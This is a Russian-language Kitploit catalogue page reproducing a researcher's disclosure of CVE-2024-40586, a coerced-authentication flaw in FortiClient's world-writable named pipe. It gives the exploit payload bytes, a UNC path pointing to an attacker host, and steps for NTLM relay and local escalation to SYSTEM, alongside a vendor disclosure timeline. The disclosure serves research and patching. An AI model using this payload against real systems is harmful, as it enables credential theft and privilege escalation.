Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient | Kitploit
Инструменты/GitHubGitHub/hagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient
Повышение привилегийАнализ уязвимостейЭксплуатацияЛатеральное перемещениеТестирование на ПроникновениеАутентификацияRed Teaming
GitHubhagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient

Репозиторий
11 год назадЕщё не проверено

CVE-2024-40586 Принудительная аутентификация Windows в FortiClient

В операционной системе Windows обнаружено, что FortiClient (версия приложения 7.0.8.0427) позволяет удалённому непривилегированному пользователю принуждать хосты Windows проходить аутентификацию на других машинах через именованный канал, отвечающий за службу FortiSSLVPNdaemon.

Было обнаружено, что именованный канал "FortiSslvpnNamedPipe" разрешает чтение и запись любому пользователю.

Fig1

Анализ

Приложение считывает 5-й байт буфера из именованного канала как код операции PipeBuffer+4

Fig2

Было обнаружено, что приложение прочитает файл, если код операции равен 24 (т.е. 0x18). Поток выполнения: Case 24 => LABEL_26 => strncpy копирует полезную нагрузку в переменную Buffer => передаёт полезную нагрузку в sub_7FF60C3EAC20 => вызывает CreateFileA => ReadFile Fig3

Fig4

Fig5

Однако приложение ничего не делает с содержимым файла.

Эксплуатация

Мы можем отправить специально сформированный трафик (т.е. "\x00\x00\x00\x00\x18\x00", объединённый с целевым путём) в уязвимый именованный канал "FortiSslvpnNamedPipe", чтобы вызвать код операции 24 и заставить процесс "FortiSSLVPNdaemon.exe" вызвать CreateFileA с привилегиями SYSTEM. Таким образом, мы можем заставить сервер подключиться к удалённому файлу, передав UNC-путь (например, "\\<remote ip>\<file path>"), или подключиться к локальному именованному каналу (например, "\\127.0.0.1\pipe\<named pipe>").

Сценарий 1

Чтобы принудить хосты Windows проходить аутентификацию на других машинах с помощью удалённого неаутентифицированного пользователя, можно выполнить следующие шаги:

  1. На машине атакующего запустите слушатель для приёма принудительной аутентификации.
  2. На машине атакующего отправьте специально сформированную полезную нагрузку (т.е. "\x00\x00\x00\x00\x18\x00" + "\\<attacker IP>\fake\fake") в уязвимый именованный канал машины-жертвы "\\<victim IP>\pipe\FortiSslvpnNamedPipe", чтобы заставить процесс подключиться к удалённому файлу по UNC-пути "\\<attacker IP>\fake\fake".
  3. Как и в других атаках с принудительной аутентификацией (например, SpoolSample), атакующий может выполнить relay-атаку или атаку с понижением уровня аутентификации.

Fig6

Сценарий 2

Чтобы повысить привилегии до SYSTEM из-под локального пользователя с привилегией "SeImpersonatePrivilege" (например, "nt authority\network service"), можно выполнить следующие шаги:

  1. Создайте сервер именованного канала, ожидающий подключения.
  2. Отправьте специально сформированную полезную нагрузку (т.е. "\x00\x00\x00\x00\x18\x00" + "\\127.0.0.1\pipe\<pipe server>\XXX") в локальный уязвимый именованный канал "\\.\pipe\FortiSslvpnNamedPipe", чтобы заставить процесс подключиться к нашему серверу именованного канала.
  3. После установления подключения вызовите ImpersonateNamedPipeClient(), чтобы олицетворить привилегии SYSTEM.

Fig7

Хронология

  • 07/09/2023 - Уязвимость сообщена в Fortinet
  • 08/30/2023 - Fortinet подтвердил уязвимость
  • 02/11/2024 - Публикация

Ссылка

  • https://fortiguard.fortinet.com/psirt/FG-IR-23-279
Скачать инструмент